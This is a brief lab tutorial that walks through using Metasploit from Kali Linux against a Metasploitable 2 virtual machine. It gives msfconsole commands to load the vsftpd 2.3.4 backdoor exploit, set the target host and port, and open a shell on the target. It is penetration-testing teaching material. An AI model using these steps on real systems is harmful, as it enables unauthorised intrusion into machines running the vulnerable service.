Metasploit has a repository for tools, libraries, modules and end user interfaces thus allowing user to configure an exploit module and launch it at target system. It is provided with a shell to interact with the payload.

Deliverable:

Lab Set up

• Virtualization using Oracle Virtual box

• Attacker’s System: Kali Linux

• Target System : Metasploitable 2

In Kali Linux --> Terminal

1. Metasploit uses postgresql database to track what user do.

~# service postgresql start (Enter)

2. Starting metasploit

~# service metasploit start (Enter)

Above command creates a postgresql user called 'msf3' and corresponding database. It also starts metaploit's RPC server and web server.

3. Starting msfconsole.

~# msfconsole (Enter)

4. Search for particular exploits

Ex. > search vsftpd (Enter)

5. Now use that exploit

> use exploit/unix/ftp/vsftpd_234_ backdoor (Enter)

> show options (Enter)

6. Now set the target’s IP address

> set RHOST [IP address of target] (Enter)

7. Now set the target’s port to be exploited

> set RPORT [port number] (Enter)

8. Exploit the target

> exploit (Enter)

9. Now we will get the shell of the target system and we can execute any commands we want to with that system.